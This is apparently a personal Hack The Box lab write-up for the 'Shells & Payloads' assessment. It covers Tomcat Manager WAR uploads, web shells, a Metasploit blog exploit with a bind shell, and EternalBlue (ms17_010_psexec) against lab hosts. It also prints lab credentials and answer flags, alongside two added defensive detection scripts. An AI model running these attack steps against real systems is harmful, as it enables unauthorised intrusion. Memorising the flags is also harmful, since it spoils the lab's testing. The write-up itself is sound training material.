Shells & Payloads - The Live Engagement
The first thing to do is connect to the Foothold host using xfreerdp:
xfreerdp3 /v:ipaddress /u:username /p:password
You will then be connected to the foothold host.

IFCONFIG
┌─[htb-student@skills-foothold]─[~]
└──╼ $ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:75:cb:8f:86 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.204.126 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb0:3448 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb0:3448 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:34:48 txqueuelen 1000 (Ethernet)
RX packets 15871 bytes 1285837 (1.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9521 bytes 12710293 (12.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.1.5 netmask 255.255.254.0 broadcast 172.16.1.255
inet6 fe80::250:56ff:feb0:e56 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:0e:56 txqueuelen 1000 (Ethernet)
RX packets 3072 bytes 436727 (426.4 KiB)
RX errors 0 dropped 10 overruns 0 frame 0
TX packets 3054 bytes 219110 (213.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 42 bytes 3104 (3.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 42 bytes 3104 (3.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌─[htb-student@skills-foothold]─[~]
Now we need to begin targeting Host-01.
Run an initial nmap scan for the first question to get an overview of what is running on the host.
┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap -A 172.16.1.11
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-12 12:01 EDT
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.044s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
515/tcp open printer Microsoft lpd
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SHELLS-WINSVR
| NetBIOS_Domain_Name: SHELLS-WINSVR
| NetBIOS_Computer_Name: SHELLS-WINSVR
| DNS_Domain_Name: shells-winsvr
| DNS_Computer_Name: shells-winsvr
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-12T16:02:53+00:00
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2025-04-11T15:42:55
|_Not valid after: 2025-10-11T15:42:55
|_ssl-date: 2025-04-12T16:02:58+00:00; 0s from scanner time.
8080/tcp open http Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.0.11
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: shells-winsvr
| NetBIOS computer name: SHELLS-WINSVR\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-12T09:02:53-07:00
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:4e:ae (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-04-12T16:02:53
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h24m00s, deviation: 3h07m49s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.78 seconds
The host name is: shells-winsvr
This is a Windows Server 2019.
Let's begin with some recon on the target.
We will visit the web server first and see what is running there and whether there is any upload functionality that could be exploited.
I checked whether Firefox was installed because I was not seeing an installed application.
Then I browsed to the web server.


It seems to be an Apache Tomcat/10.0.11 web server.
Let's look for some exploits for this version.

So far there seem to be none that could provide us with initial access.
Next, I identified something that looks pretty promising:
the Manager web app for Tomcat, it seems.
It also shows where the users are defined.

When I click on the Manager web app, it brings me to an authentication page, but we don't know the password yet.

I took the shortcut and checked the hint for Host-01.
It tells us that there are two vulnerabilities.
The creds for the potentially vulnerable service are tomcat | Tomcatadm.
I will revisit how to get the credentials later.
I tested these on the Manager page that I identified above, and the credentials worked.


Now let's explore this page.
We get some nice info about the server.
We have some sort of upload feature here.

Now, based on the above upload feature, what exactly is a WAR file? A quick GPT search and we get:

So we will need a WAR payload to upload to the Tomcat server.
But what tool can do this?
Let's check out Laudanum.
A quick search on my own VM and we can identify that there is a cmd.war payload.

Let's try it on the remote host.
Boom! The remote host also has the same thing.

Let's copy this file to a better location.

Let's try and upload this f***** payload.
Go back to the browser and try to upload it.

Press Deploy and see what happens.
We see that a new application was added, so I guess the upload worked.

Let's try and browse to this directory now.
It seems like this payload method doesn't work.
We could try another method of creating a payload.
Let's try with msfvenom.
PAYLOAD WITH MSFVENOM
Set up a listener on the attacker machine.
This will listen on port 8081 for any incoming connections.

Set up the msfvenom payload:
set the IP address and the port;
set the type of payload.

We will use this payload, try to upload it through the Tomcat Manager again, and see if we get a shell.

I tried it and realized it doesn't work. The issue is that I set the payload type to Windows, whereas the platform is an Apache web server which uses JavaScript, so my bad; I will change the payload type and hopefully it works this time.
BOOM, now it works, we have a shell.
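Both WAR uploads above (the Laudanum cmd.war and the msfvenom one) go through the same Manager endpoints, which is exactly what a defender should be watching in the Tomcat access log. The script below is an added example, not part of the original write-up: it runs over constructed access-log lines in Tomcat's default "common" pattern (the source IP, timestamps and the /cmd context path are made up) and flags repeated Manager login failures, successful WAR deployments, and the first requests to a context that did not exist before the deployment.

```python
import re
from collections import defaultdict

# Constructed sample of a Tomcat AccessLogValve "common" pattern log (not from the lab host).
SAMPLE_LOG = """\
172.16.1.5 - - [12/Apr/2025:12:20:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
172.16.1.5 - - [12/Apr/2025:12:20:04 -0400] "GET /manager/html HTTP/1.1" 401 2473
172.16.1.5 - tomcat [12/Apr/2025:12:20:15 -0400] "GET /manager/html HTTP/1.1" 200 18342
172.16.1.5 - tomcat [12/Apr/2025:12:21:03 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 19012
172.16.1.5 - - [12/Apr/2025:12:21:40 -0400] "GET /cmd/ HTTP/1.1" 200 512
10.0.0.7 - - [12/Apr/2025:12:22:10 -0400] "GET /status/ HTTP/1.1" 200 4096
"""

# %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$')

# Manager endpoints that install a WAR: the HTML form upload and the text-interface deploy.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")
# Contexts expected on this server; anything else appearing after a deploy is suspicious.
KNOWN_CONTEXTS = {"/", "/manager", "/host-manager", "/status", "/docs", "/examples"}

def detect(log_text, auth_fail_threshold=2):
    """Return alerts as tuples: (kind, source ip, detail..., timestamp)."""
    alerts, fails, deployed_by = [], defaultdict(int), {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?")[0]          # drop the CSRF nonce / query string
        ip, user, status = m["ip"], m["user"], int(m["status"])
        if path.startswith("/manager") and status == 401:
            fails[ip] += 1                      # credential guessing against the Manager
            if fails[ip] == auth_fail_threshold:
                alerts.append(("manager_auth_failures", ip, m["ts"]))
        elif path in DEPLOY_PATHS and status == 200:
            deployed_by[ip] = user              # a WAR was installed: code execution as Tomcat
            alerts.append(("war_deployed", ip, user, m["ts"]))
        elif deployed_by and "/" + path.split("/")[1] not in KNOWN_CONTEXTS:
            alerts.append(("new_context_accessed", ip, path, m["ts"]))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```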


So we are done with HOST-01, let's move on to the next.
HOST-02
Enum
Nmap Scan
┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap blog.inlanefreight.local -A
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 02:16 EDT
Nmap scan report for blog.inlanefreight.local (172.16.1.12)
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f6:21:98:29:95:4c:a4:c2:21:7e:0e:a4:70:10:8e:25 (RSA)
| 256 6c:c2:2c:1d:16:c2:97:04:d5:57:0b:1e:b7:56:82:af (ECDSA)
|_ 256 2f:8a:a4:79:21:1a:11:df:ec:28:68:c2:ff:99:2b:9a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Inlanefreight Gabber
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.75 seconds
So we know that it is an Ubuntu machine.
There is SSH;
we can try to access it later.
There is an HTTP web server running.
We see robots.txt: something we can explore for hidden directories.
Checking out the web server

There seems to be a guy named Slade Wilson posting on the blog website.

The question in HTB asks something similar to the blog post by Slade Wilson.

Let's check out the post; maybe we can identify an answer.
The answer is: php
Basically, look at the link of the exploit and read through the code and you will see the following:

Now, to exploit this blog website, I guess we will have to identify a way to upload this exploit, so let's have a look back at the blog.
There seems to be a login for the user Slade Wilson... umm, interesting.

I wonder what the credentials could be...
If we check the hints for Host-2 we get some sort of credentials for the blog, so let's try and use those:
admin:admin123!@#
We gain access as Slade Wilson, nice!

We can now create blog posts as Slade Wilson.
Exploitation - With Metasploit
To exploit this we can use Metasploit, which should have the exploit module identified by Slade Wilson.
Let's try:
msfconsole -q
msf](Jobs:0 Agents:0) >> use 50064.rb
[*] Using configured payload php/meterpreter/bind_tcp
[msf](Jobs:0 Agents:0) exploit(50064) >> show options
Module options (exploit/50064):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD demo yes Blog password
Proxies no A proxy chain of format type:host:por
t[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identi
fier, or hosts file with syntax 'file
:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connec
tions
TARGETURI / yes The URI of the arkei gate
USERNAME demo yes Blog username
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Now we set the required options:
set VHOST blog.inlanefreight.local
We need to identify the IP address of the blog web server:
└──╼ $ping -c 1000 blog.inlanefreight.local
PING blog.inlanefreight.local (172.16.1.12) 56(84) bytes of data.
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=1 ttl=64 time=0.423 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=2 ttl=64 time=0.481 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=3 ttl=64 time=0.612 ms
^C
--- blog.inlanefreight.local ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2055ms
rtt min/avg/max/mdev = 0.423/0.505/0.612/0.079 ms
Now we set the remaining options:
[msf](Jobs:0 Agents:0) exploit(50064) >> set VHOST blog.inlanefreight.local
VHOST => blog.inlanefreight.local
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOSTS 172.16.1.12
RHOSTS => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOST 172.16.1.12
RHOST => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set USERNAME admin
USERNAME => admin
[msf](Jobs:0 Agents:0) exploit(50064) >> set PASSWORD admin123!@#
PASSWORD => admin123!@#
Now let's exploit this shit... and BOOM, we are in!!

HTB ANSWER: B1nD_Shells_r_cool

HOST-03
Enum
nmap scan
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #nmap -A 172.16.1.13
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 12:04 EDT
Nmap scan report for 172.16.1.13
Host is up (0.0034s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: 172.16.1.13 - /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
MAC Address: 00:50:56:B0:6C:CC (VMware)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
|_nbstat: NetBIOS name: SHELLS-WINBLUE, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:6c:cc (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: SHELLS-WINBLUE
| NetBIOS computer name: SHELLS-WINBLUE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-13T09:05:19-07:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-13T16:05:19
|_ start_date: 2025-04-13T15:06:06
TRACEROUTE
HOP RTT ADDRESS
1 3.43 ms 172.16.1.13
Enumerating the web server
When we visit the website, we see it's just a directory listing.

We see that there is an upload.aspx used for uploading aspx files, so in this case we can create an aspx payload using various methods to gain a shell.
Exploit
Let's try with 🧪 Laudanum – "One Web Shell to Rule Them All".
Locate Laudanum and find the right shell payload.

We can copy this payload to our own directory:
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #cd /usr/share/laudanum/aspx/
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #ls
shell.aspx
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #cp shell.aspx /home/htb-student/
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #cd /home/htb-student/
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #ls
ls: cannot access 'thinclient_drives': Permission denied
core Documents Music Public Templates Videos
Desktop Downloads Pictures shell.aspx thinclient_drives
┌─[✗]─[root@skills-foothold]─[/home/htb-student]
└──╼ #
Now let's change some settings, most likely the allowed IPs; let's see.
I've added the foothold's IP address.

Now let's try and upload this payload and see if we can get a shell.
IT WORKED!!!!

Ummmmm... it seems that access is denied when trying to change directory into the Administrator account.
I did look at the hint; it mentioned Blue, so this means that this host is vulnerable to EternalBlue. I went down a rabbit hole through the web server, but at least we got a shell through there; we could have maybe done it another way.
Let's test the EternalBlue method.
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #msfconsole -q
Search for the exploit:
[msf](Jobs:0 Agents:0) >> search ms17
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec
We will use option 1, the psexec one.
Set the other options:
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set RHOSTS 172.16.1.13
RHOSTS => 172.16.1.13
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set LHOST 172.16.1.5
LHOST => 172.16.1.5
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >>
Now we can spray and pray!
BOOM WE GOT A GOOD SHELL
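Before reaching for ms17_010_psexec, the nmap output above already contains what a defender needs to prioritise this host: a build that predates the MS17-010 fix and SMB signing that is not required. The script below is an added example, not from the write-up: it parses trimmed excerpts of the page's own nmap -A output for Host-03 and Host-01 and derives the two follow-up flags; the build cut-off constant is my assumption that builds up to 14393 (Server 2016 RTM and older) shipped before the March 2017 fix and must be verified patched.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Trimmed excerpts of the nmap -A output shown earlier on this page (Host-03 and Host-01).
NMAP_HOST03 = """\
Nmap scan report for 172.16.1.13
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""
NMAP_HOST01 = """\
Nmap scan report for status.inlanefreight.local (172.16.1.11)
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""

# Assumption used for triage: builds up to 14393 (Server 2016 RTM and older) shipped
# before the March 2017 MS17-010 fix, so their SMB patch state must be verified explicitly.
LAST_PRE_MS17_010_BUILD = 14393

@dataclass
class SmbFinding:
    host: str
    smb_open: bool
    os_build: Optional[int]
    signing_required: bool   # False -> exposed to SMB relay / spoofing
    verify_ms17_010: bool    # True -> confirm the MS17-010 patch before anything else

def triage(nmap_text: str) -> SmbFinding:
    """Extract the SMB-relevant facts from nmap -A text output and derive follow-up flags."""
    host = re.search(r"Nmap scan report for .*?(\d+\.\d+\.\d+\.\d+)", nmap_text).group(1)
    smb_open = re.search(r"^445/tcp\s+open", nmap_text, re.M) is not None
    build = re.search(r"^\|\s+OS: Windows Server \d+ \w+ (\d{5})", nmap_text, re.M)
    os_build = int(build.group(1)) if build else None
    # Either nmap script wording means clients may talk SMB unsigned.
    unsigned = re.search(r"Message signing enabled but not required|message_signing: disabled", nmap_text)
    verify = smb_open and os_build is not None and os_build <= LAST_PRE_MS17_010_BUILD
    return SmbFinding(host, smb_open, os_build, unsigned is None, verify)

if __name__ == "__main__":
    for text in (NMAP_HOST03, NMAP_HOST01):
        print(triage(text))
```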

To answer the final HTB question:
(Meterpreter 1)(C:\Windows\system32) > cat C:/Users/Administrator/Desktop/Skills-flag.txt
One-H0st-Down!(Meterpreter 1)(C:\Windows\system32) >